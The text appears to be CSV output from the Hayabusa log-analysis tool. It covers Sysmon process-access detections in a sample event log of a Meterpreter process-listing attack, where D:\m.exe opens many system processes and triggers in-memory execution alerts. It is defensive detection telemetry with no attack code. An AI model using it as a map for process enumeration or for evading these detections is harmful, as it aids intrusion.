2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 956 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-001014C90000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1016 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-001012CF0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: 
C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1148 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-0010F9D80000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\spoolsv.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1288 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-00100EED0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1328 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-0010B8F20000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1476 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010D30E0100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: 
D:\m.exe | Tgt Process: C:\Windows\system32\taskhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1504 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-001062120100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\taskeng.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1572 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010051A0100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Program Files\OpenSSH\bin\cygrunsrv.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1732 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010443A0100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\conhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1904 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010F7500100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 
+09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Program Files\OpenSSH\usr\sbin\sshd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1952 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-00108A560100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wlms\wlms.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1996 | Tgt PGUID: 365ABB72-F6A4-5CC7-0000-0010C65F0100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wbem\unsecapp.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1000 | Tgt PGUID: 365ABB72-F6A4-5CC7-0000-001098750100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\sppsvc.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1896 | Tgt PGUID: 
365ABB72-F6A4-5CC7-0000-001020BA0100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2160 | Tgt PGUID: 365ABB72-F6A5-5CC7-0000-00100CD40100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2192 | Tgt PGUID: 365ABB72-F6A5-5CC7-0000-001094D70100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wbem\wmiprvse.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2360 | Tgt PGUID: 365ABB72-F6A5-5CC7-0000-00108AFF0100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Program Files\Google\Update\1.3.34.7\GoogleCrashHandler.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 
365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2416 | Tgt PGUID: 365ABB72-F6A6-5CC7-0000-00103F140200,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2448 | Tgt PGUID: 365ABB72-F6A6-5CC7-0000-0010DC200200,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\Dwm.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2788 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-0010A25C0600,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\Explorer.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2812 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-0010135F0600,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\VBoxTray.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2908 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-00109B9A0600,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Roaming\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3016 | Tgt PGUID: 365ABB72-F6CA-5CC7-0000-00104DBB0600,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3028 | Tgt PGUID: 365ABB72-F6CA-5CC7-0000-001048C10600,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\conhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3044 | Tgt PGUID: 365ABB72-F6CA-5CC7-0000-001017C50600,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\SearchIndexer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3264 | Tgt PGUID: 365ABB72-F6CF-5CC7-0000-00100C870700,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2500 | Tgt PGUID: 365ABB72-F787-5CC7-0000-001068B30A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\conhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2024 | Tgt PGUID: 365ABB72-F787-5CC7-0000-0010FBB30A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\mmc.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2352 | Tgt PGUID: 365ABB72-F797-5CC7-0000-00105AF70A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\taskeng.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1236 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010B31E0E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\launcher.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3712 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010D0220E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3624 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010DF2F0E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3504 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-0010AF380E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
